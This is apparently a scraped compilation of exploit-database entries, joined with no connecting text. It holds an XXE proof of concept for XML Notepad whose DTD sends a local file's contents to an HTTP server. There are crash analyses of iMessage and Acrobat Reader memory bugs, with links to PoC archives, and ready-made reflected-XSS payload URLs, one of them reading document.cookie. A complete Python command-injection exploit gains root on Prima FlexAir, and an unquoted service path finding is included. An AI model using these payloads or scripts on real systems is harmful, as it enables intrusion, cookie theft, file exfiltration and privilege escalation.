ISHACK AI BOT

# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection # Date: 2019-11-11 # Exploit Author: 8-Team / daejinoh # Vendor Homepage: https://www.microsoft.com/ # Software Link: https://github.com/microsoft/XmlNotepad # Version: XML Notepad 2.8.0.4 # Tested on: Windows 10 Pro # CVE : N/A # Step 1) File -> Open -> *.xml # Exploit Code 1) Server(python 3.7) : python -m http.server 2) Poc.xml : <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> 3) payload.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>"> %all; --------------------------------------------------------------------------------

During processing of incoming iMessages, attacker controlled data is deserialized using the NSUnarchiver API. One of the classes that is allowed to be decoded from the incoming data is NSDictionary. However, due to the logic of NSUnarchiver, all subclasses of NSDictionary that also implement secure coding can then be deserialized as well. NSSharedKeyDictionary is an example of such a subclass. A NSSharedKeyDictionary is a dictionary for which, for performance reasons, the keys are predefined using a NSSharedKeySet. A NSSharedKeyDictionary is essentially a linear array of values and a pointer to its NSSharedKeySet. An NSSharedKeySet on the other hand looks roughly like this (with some fields omitted for simplicity and translated to pseudo-C): struct NSSharedKeySet { unsigned int _numKeys; // The number of keys in the _keys array id* _keys; // A pointer to an array containing the key values unsigned int _rankTable; // A table basically mapping the hashes of // the keys to an index into _keys unsigned int _M; // The size of the _rankTable unsigned int _factor; // Used to compute the index into _rankTable from a hash. NSSharedKeySet* _subKeySet; // The next KeySet in the chain }; The value lookup on an NSSharedKeyDictionary then works roughly as follows: * NSSharedKeyDictionary invokes [NSSharedKeySet indexForKey:] on its associated keySet * indexForKey: computes the hash of the key, basically computes rti = hash % _factor, bounds-checks that against _M, and finally uses it to lookup the index in its rankTable: idx = _rankTable[rti] * It verifies that idx < _numKeys * It loads _keys[idx] and invokes [key isEqual:candidate] with it as argument * If the result is true, the index has been found and is returned to the NSSharedKeyDictionary where it is used to index into its values array * If not, indexForKey: recursively processes the subKeySet in the same way until it either finds the key or there is no subKeySet left, in which case it returns -1 The NSArchiver format is powerful enough to allow reference cycles between decoded objects. This now enables the following attack: SharedKeyDictionary1 --[ keySet ]-> SharedKeySet1 --[ subKeySet ]-> SharedKeySet2 --+ ^ | | [ subKeySet ] | | +-----------------------------------------+ What will happen now is the following: * The SharedKeyDictionary1 is decoded and its initWithCoder: executed * [NSSharedKeyDictionary initWithCoder:] decodes its _keySet, which is SharedKeySet1 * The [NSSharedKeySet initWithCoder:] for SharedKeyDictionary1 reads and initializes the following fields: * _numKeys, which at this point is unchecked and can be any unsigned integer value. Only later will it be checked to be equal to the number of keys in the _keys array. * _rankTable, with completely attacker controlled content * _M, which must be equal to the size of the _rankTable * _factor, which must be a prime but otherwise can be arbitrarily chosen At this point, _numKeys = 0xffffffff but _keys is still nullptr (because ObjC objects are allocated with calloc) * Next, *before* initializing _keys, it deserializes the _subKeySet, SharedKeySet2 * [NSSharedKeySet initWithCoder:] of SharedKeySet2 finishes, and at the end verifies that it is a valid SharedKeySet. It does that by checking that all its keys correctly map to an index. For that it calls [NSSharedKeySet indexForKey:] on itself for every key. * (At least) one of the keys will, however, not be found on SharedKeySet2. As such, indexForKey: will proceed to search for the key in its _subKeySet, which is actually SharedKeySet1 * The lookup proceeds and determines that the index should be (in our case) 2189591170, which is less than SharedKeySet1->numKey (which is still 0xffffffff) * It then loads SharedKeySet1->keys[2189591170], which, as ->_keys is still nullptr, reads an objc_object* from 0x414141410 and thus crashes The attached PoC demonstrates this on the latest macOS 10.14.6 > clang -o tester tester.m -framework Foundation > ./generator.py > lldb -- ./tester payload.xml (lldb) target create "./tester" Current executable set to './tester' (x86_64). (lldb) settings set -- target.run-args "payload.xml" (lldb) r 2019-07-29 15:40:28.989305+0200 tester[71168:496831] Let's go Process 71168 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x414141410) frame #0: 0x00007fff3390d3e7 CoreFoundation`-[NSSharedKeySet indexForKey:] + 566 CoreFoundation`-[NSSharedKeySet indexForKey:]: -> 0x7fff3390d3e7 <+566>: mov rdx, qword ptr [rax + 8*r13] Combined with a heap spray, this bug could likely be remotely exploitable. Ideally, this issue and similar ones can be prevented by removing the NSSharedKeyDictionary attack surface completely, as originally suggested by Natalie. Alternatively, I think another solution might be to stop encoding all the internal fields of the NSSharedKeyDictionary/NSSharedKeySet (rankTable, numKeys, especially the subKeySet, ...) and only encode the keys and values. The new [initWithCoder:] implementations could then just call +[NSSharedKeySet keySetWithKeys:] and +[NSSharedKeyDictionary sharedKeyDictionaryWithKeySet:] to construct new instances with the decoded keys and values. This should be fine as all the other fields are implementation details anyway. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47608.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (5708.4564): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=c0c0c0c0 ebx=00000000 ecx=6826e380 edx=00000000 esi=00000002 edi=00000006 eip=15e440e8 esp=047fc158 ebp=047fc1b8 iopl=0 nv up ei ng nz ac po cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210293 CoolType!CTCleanup+0x25be8: 15e440e8 f6403860 test byte ptr [eax+38h],60h ds:002b:c0c0c0f8=?? 0:000> u @$scopeip-9 CoolType!CTCleanup+0x25bdf: 15e440df 8b4d08 mov ecx,dword ptr [ebp+8] 15e440e2 8b7dc4 mov edi,dword ptr [ebp-3Ch] 15e440e5 8b0481 mov eax,dword ptr [ecx+eax*4] 15e440e8 f6403860 test byte ptr [eax+38h],60h 15e440ec 0f851f010000 jne CoolType!CTCleanup+0x25d11 (15e44211) 15e440f2 0fb7781a movzx edi,word ptr [eax+1Ah] 15e440f6 0fb7401e movzx eax,word ptr [eax+1Eh] 15e440fa 8bc8 mov ecx,eax 0:000> dd ecx 6826e380 16063e80 16063e40 1605fd00 c0c0c0c0 6826e390 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3a0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3b0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3d0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3e0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 6826e3f0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 047fc1b8 15e434ea 6826e380 1605fce0 6826e388 CoolType!CTCleanup+0x25be8 01 047fc1d4 15e43f02 6826e380 1605fd00 6826e388 CoolType!CTCleanup+0x24fea 02 047fc1fc 15e4edc1 6936cff0 16063e40 1605fd00 CoolType!CTCleanup+0x25a02 03 047fc230 15deb53d 6936cbf0 047fcca4 00000f5c CoolType!CTCleanup+0x308c1 04 047fc94c 15de6251 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x483dd 05 047fca30 15e223fa 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x430f1 06 047fcb88 15e220be 6936cbf0 047fcd5c 047fcd2c CoolType!CTCleanup+0x3efa 07 047fcc04 15df972d 6936cbf0 16067080 047fcd5c CoolType!CTCleanup+0x3bbe 08 047fcdcc 15df8f00 047fcfc0 00000000 16067330 CoolType!CTInit+0x565cd 09 047fce9c 15df7d87 0b601000 00000001 00000001 CoolType!CTInit+0x55da0 0a 047fd268 15df7414 0000012c 86c0e9cc 00001aba CoolType!CTInit+0x54c27 0b 047fd2ac 15df63de 86c0e9c0 00000064 047fd344 CoolType!CTInit+0x542b4 0c 047fd41c 15df5eb9 047fd834 047fdbb0 0000044a CoolType!CTInit+0x5327e 0d 047fd470 16112a42 3ede4e60 047fd834 047fdbb0 CoolType!CTInit+0x52d59 0e 047fd7b8 16111888 8ec19b64 047fd834 047fdbb0 AGM!AGMInitialize+0x69bd2 0f 047fd918 160dc460 047fd980 8ec19b00 047fdc48 AGM!AGMInitialize+0x68a18 10 047fd9b4 160e469a 047fdb98 8ec19b00 047fdc48 AGM!AGMInitialize+0x335f0 11 047fdbe0 160e2ae0 3eb84ba0 67b69f70 8ec19b00 AGM!AGMInitialize+0x3b82a 12 047fddbc 160e186c 3eb84ba0 67b69f70 56375db9 AGM!AGMInitialize+0x39c70 13 047fde08 161107ff 3eb84ba0 67b69f70 68a8ad50 AGM!AGMInitialize+0x389fc 14 047fde2c 1611030e 00000301 1611044f 67b69f70 AGM!AGMInitialize+0x6798f 15 047fde34 1611044f 67b69f70 56375d11 68a8ad50 AGM!AGMInitialize+0x6749e 16 047fde6c 160b945b 047fdf40 1610f910 00000000 AGM!AGMInitialize+0x675df 17 047fdec0 5fdcd4ad 047fde00 5fdcd4b4 dd9e27c4 AGM!AGMInitialize+0x105eb 18 047fdec8 5fdcd4b4 dd9e27c4 68a8ad50 047fdeac AcroRd32!DllCanUnloadNow+0x18454d 19 047fdee8 5fddb77d 3ede4f64 7cb8ed90 047fdf00 AcroRd32!DllCanUnloadNow+0x184554 1a 047fdf04 5fddb274 553c0f84 dd9e2644 553c0f58 AcroRd32!DllCanUnloadNow+0x19281d 1b 047fdf6c 5fdeef36 dd9e2698 00000000 553c0f58 AcroRd32!DllCanUnloadNow+0x192314 1c 047fdfb0 5fddaa40 dd9e26d4 5e4a0f78 553c0f58 AcroRd32!CTJPEGDecoderRelease+0x3426 1d 047fdffc 5fdda902 dd9e196c 5e4a0f78 047fe0ec AcroRd32!DllCanUnloadNow+0x191ae0 1e 047fe044 5fdda7e3 047fe060 dd9e1998 047fe41c AcroRd32!DllCanUnloadNow+0x1919a2 1f 047fe0b0 5fdda677 047fe0ec 8ef46ff0 3fe7bc80 AcroRd32!DllCanUnloadNow+0x191883 20 047fe110 5fdd8aed 8ef46ff0 5fddbc70 047fe41c AcroRd32!DllCanUnloadNow+0x191717 21 047fe210 5fdd8542 047fe41c dd9e1b74 1a74ed88 AcroRd32!DllCanUnloadNow+0x18fb8d 22 047fe25c 5fdd79dd 047fe41c 047fe424 dd9e1df0 AcroRd32!DllCanUnloadNow+0x18f5e2 23 047fe4d8 5fdd77ee 00000002 81ffa4e2 dd9e1c1c AcroRd32!DllCanUnloadNow+0x18ea7d 24 047fe534 5fd9706a 00000002 81ffa4e2 dd9e1ec4 AcroRd32!DllCanUnloadNow+0x18e88e 25 047fe7ec 5fd95d98 5ee78ef8 047fe880 047fe8d0 AcroRd32!DllCanUnloadNow+0x14e10a 26 047fe8f0 5fd95175 5ee78ef8 047fea20 00000000 AcroRd32!DllCanUnloadNow+0x14ce38 27 047fea44 5fd942ba 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14c215 28 047feaa4 5fd9414d 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b35a 29 047feac4 5fd92d3c 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed 2a 047feb7c 5fd92762 00000001 00000000 dd9e12fc AcroRd32!DllCanUnloadNow+0x149ddc 2b 047febd4 5fd9257a 7313eef0 00000001 dd9e1510 AcroRd32!DllCanUnloadNow+0x149802 2c 047fec38 5fd922ff 047fed2c dd9e1464 81ff8fa0 AcroRd32!DllCanUnloadNow+0x14961a 2d 047fed4c 5fc5687c 81ff8fa0 5fc567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f 2e 047fed64 5fc5678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c 2f 047fed80 745de0bb 03870c42 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f 30 047fedac 745e8849 5fc566d0 03870c42 0000000f USER32!_InternalCallWinProc+0x2b 31 047fedd0 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20 32 047feea0 745d8503 5fc566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be 33 047fef08 745d8aa0 13ff4e80 00000000 0000000f USER32!DispatchClientMessage+0x1b3 34 047fef50 77371a6d 047fef6c 00000020 047fefcc USER32!__fnDWORD+0x50 35 047fef88 745d91ee 047ff01c e165025c 18170dd8 ntdll!KiUserCallbackDispatcher+0x4d 36 047fefdc 745d8c20 e51aed80 047ff000 5fc6da6d USER32!DispatchMessageWorker+0x5be 37 047fefe8 5fc6da6d 047ff01c 18170dd8 18170dd8 USER32!DispatchMessageW+0x10 38 047ff000 5fc6d89e 047ff01c dd9e095c 18170dd8 AcroRd32!DllCanUnloadNow+0x24b0d 39 047ff074 5fc6d744 dd9e0984 18170dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e 3a 047ff0ac 5fbfc575 dd9e0834 16d7eff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4 3b 047ff11c 5fbfbf81 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x775 3c 047ff53c 0011783d 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x181 3d 047ff908 002201aa 00110000 00000000 0b61b3f2 AcroRd32_exe+0x783d 3e 047ff954 76698674 0480b000 76698650 5ab919ba AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da 3f 047ff968 77365e17 0480b000 666934db 00000000 KERNEL32!BaseThreadInitThunk+0x24 40 047ff9b0 77365de7 ffffffff 7738ad9b 00000000 ntdll!__RtlUserThreadStart+0x2f 41 047ff9c0 00000000 00111390 0480b000 00000000 ntdll!_RtlUserThreadStart+0x1b --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes). - The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to three bytes at offsets 0x71a4, 0x71a5 and 0x71ba. They were changed from 0x1C, 0x14, 0x89 to 0xFF, 0xFF, 0x0E. When we analyzed it further, we determined that these bytes reside inside the "CFF " table of the embedded OpenType font. After extracting the font and decompiling it with the ttx tool from FontTools, we found that the difference is in the CharString of the "afii10091" glyph. Original code: --- cut --- [...] cntrmask 00011100 cntrmask 00000110 32 hmoveto 660 hlineto 120 0 32 -22 15 -146 rrcurveto 28 0 -13 203 -2 0 rlineto [...] --- cut --- Mutated code: --- cut --- [...] cntrmask 11111111 1707.08974 -99 hlineto 120 0 32 -22 15 -146 rrcurveto 28 0 -13 203 endchar 0 rlineto [...] --- cut --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47610.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (88e4.30f4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000001 ebx=0478be34 ecx=00000000 edx=c0c0c0c0 esi=00000000 edi=00000000 eip=5fdc2341 esp=0478bd24 ebp=0478bd54 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1: 5fdc2341 8a4a04 mov cl,byte ptr [edx+4] ds:002b:c0c0c0c4=?? 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 0478bd54 5fdb1157 0478be48 ceb1c57a 68754f88 AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1 01 0478bea0 5fdafd04 68754f88 00000002 687fefe8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x35f7 02 0478bed8 5fda234f 5f198f54 5f198f54 68504fb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21a4 03 0478beec 5fd95227 68504fb8 00000044 684fcf40 AcroRd32!AX_PDXlateToHostEx+0x34468f 04 0478bfa0 5f795889 5f198f54 590b4fb0 5f7957f0 AcroRd32!AX_PDXlateToHostEx+0x337567 05 0478bfc4 5f795783 4d346ff8 00000001 00000001 AcroRd32!DllCanUnloadNow+0x4c929 06 0478bfe4 5fbe1d7a 0478c008 4d346ff8 00000001 AcroRd32!DllCanUnloadNow+0x4c823 07 0478c028 5f8cafc8 c0020000 00000001 4d346ff8 AcroRd32!AX_PDXlateToHostEx+0x1840ba 08 0478c37c 5f8ca506 0478c3d8 7492ea98 ceb1b86e AcroRd32!DllCanUnloadNow+0x182068 09 0478c3b4 5f8ca3e1 0478c3d8 7492ea98 0478c444 AcroRd32!DllCanUnloadNow+0x1815a6 0a 0478c420 5f8c93a8 c0020000 00000001 7492ea98 AcroRd32!DllCanUnloadNow+0x181481 0b 0478c880 5f8c68f7 0478cb84 6856c5ac c0020000 AcroRd32!DllCanUnloadNow+0x180448 0c 0478e060 5f8c6575 6856c5ac c0020000 00000001 AcroRd32!DllCanUnloadNow+0x17d997 0d 0478e130 5f8aa25c ceb199ca 45e6ef78 00000000 AcroRd32!DllCanUnloadNow+0x17d615 0e 0478e210 5f8a9057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc 0f 0478e25c 5f89c183 45e6ef78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7 10 0478e3d0 5f89ba97 67fccdbc 00000001 5ef9cef8 AcroRd32!DllCanUnloadNow+0x153223 11 0478e438 5f899281 ceb19f62 6fca6fc8 823c2ea8 AcroRd32!DllCanUnloadNow+0x152b37 12 0478e4b8 5f898dae 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x150321 13 0478e4f4 5f898d07 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x14fe4e 14 0478e57c 5f8982ee 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14fda7 15 0478e5b8 5f896f02 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14f38e 16 0478e87c 5f895d98 5ef9cef8 0478e910 0478e960 AcroRd32!DllCanUnloadNow+0x14dfa2 17 0478e980 5f895175 5ef9cef8 0478eab0 00000000 AcroRd32!DllCanUnloadNow+0x14ce38 18 0478ead4 5f8942ba 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14c215 19 0478eb34 5f89414d 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b35a 1a 0478eb54 5f892d3c 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed 1b 0478ec0c 5f892762 00000001 00000000 ceb197be AcroRd32!DllCanUnloadNow+0x149ddc 1c 0478ec64 5f89257a 3f3fcef0 00000001 ceb19712 AcroRd32!DllCanUnloadNow+0x149802 1d 0478ecc8 5f8922ff 0478edbc ceb19606 8355afa0 AcroRd32!DllCanUnloadNow+0x14961a 1e 0478eddc 5f75687c 8355afa0 5f7567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f 1f 0478edf4 5f75678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c 20 0478ee10 745de0bb 02a20faa 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f 21 0478ee3c 745e8849 5f7566d0 02a20faa 0000000f USER32!_InternalCallWinProc+0x2b 22 0478ee60 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20 23 0478ef30 745d8503 5f7566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be 24 0478ef98 745d8aa0 13f2abb0 00000000 0000000f USER32!DispatchClientMessage+0x1b3 25 0478efe0 77371a6d 0478effc 00000020 0478f05c USER32!__fnDWORD+0x50 26 0478f018 745d91ee 0478f0ac ce1677b9 18068dd8 ntdll!KiUserCallbackDispatcher+0x4d 27 0478f06c 745d8c20 ca6e87d5 0478f090 5f76da6d USER32!DispatchMessageWorker+0x5be 28 0478f078 5f76da6d 0478f0ac 18068dd8 18068dd8 USER32!DispatchMessageW+0x10 29 0478f090 5f76d89e 0478f0ac ceb18ade 18068dd8 AcroRd32!DllCanUnloadNow+0x24b0d 2a 0478f104 5f76d744 ceb18ae6 18068dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e 2b 0478f13c 5f6fc575 ceb18a76 16cb6ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4 2c 0478f1ac 5f6fbf81 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x775 2d 0478f5cc 0011783d 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x181 2e 0478f998 002201aa 00110000 00000000 0b48b3f2 AcroRd32_exe+0x783d 2f 0478f9e4 76698674 04504000 76698650 1f7eb52b AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da 30 0478f9f8 77365e17 04504000 fdd62153 00000000 KERNEL32!BaseThreadInitThunk+0x24 31 0478fa40 77365de7 ffffffff 7738adab 00000000 ntdll!__RtlUserThreadStart+0x2f 32 0478fa50 00000000 00111390 04504000 00000000 ntdll!_RtlUserThreadStart+0x1b --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes). - The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to a single byte at offset 0x2f5, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0x35. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47609.zip

# Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-09-06 # Exploit Author: Rishu Ranjan (Cy83rl0gger) # Vendor Homepage: https://www.myadrenalin.com/ # Software Link: https://www.myadrenalin.com/core-hcm/ # Version: 5.4.0 (REQUIRED) # Tested on: NA # CVE : CVE-2018-12234 # Type: webapps # Platform: Multiple # Description # ==================== # A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 of HRMS Software. # The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response. # URL # ==================== https://<Host:port>/Adrenalin/flexiportal/GeneralInfo.aspx?strAction=Update0%22[Javascript code]22HRMS%22%29%2f%2f1 https://<Host:port>/myadrenalin/flexiportal/GeneralInfo.aspx?strAction=Update11170%22%3balert(%22HRMS%22)%2f%2f155 Parameter ==================== strAction Attack Type ==================== Remote CVE Impact Other ==================== Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc. Reference ==================== https://nvd.nist.gov/vuln/detail/CVE-2018-12234 https://www.knowcybersec.com/2018/09/first-cve-2018-12234-reflected-XSS.html Discoverer ==================== Rishu Ranjan

# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution # Google Dork: NA # Date: 2018-09-06 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.primasystems.eu/ # Software Link: https://primasystems.eu/flexair-access-control/ # Version: 2.3.38 # Tested on: NA # CVE : CVE-2019-7670 #!/usr/bin/env python # # Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38 # via Command Injection in SetNTPServer request, Server parameter. # # CVE: CVE-2019-7670 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # # By Gjoko 'LiquidWorm' Krstic # # 18.01.2019 # ############################################################################ # # $ python ntpcmdinj.py # [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command] # [+] Example: python ntpcmdinj.py http://10.0.251.17:8080 10167847 whoami # # $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 "uname -a" # Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux # # $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 id # uid=0(root) gid=0(root) groups=0(root),10(wheel) # ############################################################################ # import requests import sys##### if len(sys.argv) < 4: print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]' print '[+] Example: python ntpcmdinj.py http://10.0.0.17:8080 10167847 whoami\n' sys.exit() host = sys.argv[1] sessionid = sys.argv[2] commando = sys.argv[3] url = host+"/bin/sysfcgi.fx" headers = {"Session-ID" : sessionid, # Muy importante! "User-Agent" : "Dj/Ole", "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8", "Accept" : "text/html, */*; q=0.01", "Session-Pc" : "2", "X-Requested-With" : "XMLHttpRequest", "Accept-Encoding" : "gzip, deflate", "Accept-Language" : "en-US,en;q=0.9"} payload = ("<requests><request name=\"SetNTPServer\">" "<param name=\"Server\" value=\"2.europe.p" "ool.ntp.org;"+commando+">/www/pages/ap" "p/images/logos/stage.txt|\"/></request></" "requests>") requests.post(url, headers=headers, data=payload) e = requests.get(host+"/app/images/logos/stage.txt") print e.text

# Exploit Title: Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-09-06 # Exploit Author: Rishu Ranjan (Cy83rl0gger) # Vendor Homepage: https://www.myadrenalin.com/ # Software Link: https://www.myadrenalin.com/core-hcm/ # Version: 5.4.0 (REQUIRED) # Tested on: NA # CVE : CVE-2018-12650 # Type: webapps # Platform: Multiple # Description # ==================== # A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 HRMS Software. # The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response. URL ==================== https://<Host:port>/myadrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined https://<Host:port>/Adrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined Parameter ==================== prntDDLCntrlName prntFrmName Attack Type ==================== Remote CVE Impact Other ==================== Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc. Reference ==================== https://nvd.nist.gov/vuln/detail/CVE-2018-12650 https://www.knowcybersec.com/2018/10/CVE-2018-12650-reflected-XSS.html Discoverer ==================== Rishu Ranjan

# Exploit Title: Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-09-06 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : CVE-2019-10846 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1 username="><script>confirm(document.cookie)</script>&submit_button=Send+Me+a+New+Password+Via+Email ======= POST /cbas/index.php?m=auth&a=login HTTP/1.1 username="><marquee>htmlinjection</marquee>&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62 ======= GET /cbas/index.php?m=auth&a=login&username="><marquee>my milkshake brings all the boys to the yard.</marquee>&password=damn_right HTTP/1.1

# Exploit Title: Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path # Date: 2019-11-11 # Author: Alejandra Sánchez # Vendor Homepage: https://www.acronis.com # Software: ftp://supportdownload:[email protected]/AcronisTrueImageOEM_5128.exe # Version: 19.0.5128 # Tested on: Windows 10 # Description: # Acronis True Image OEM 19.0.5128 suffers from an unquoted search path issue impacting the service 'afcdpsrv'. This could potentially allow an # authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require # the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges # of the application. # Prerequisites # Local, Non-privileged Local User with restart capabilities # Details C:\>wmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Acronis Nonstop Backup Service afcdpsrv C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe Auto C:\>sc qc afcdpsrv [SC] QueryServiceConfig SUCCESS SERVICE_NAME: afcdpsrv TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Acronis Nonstop Backup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

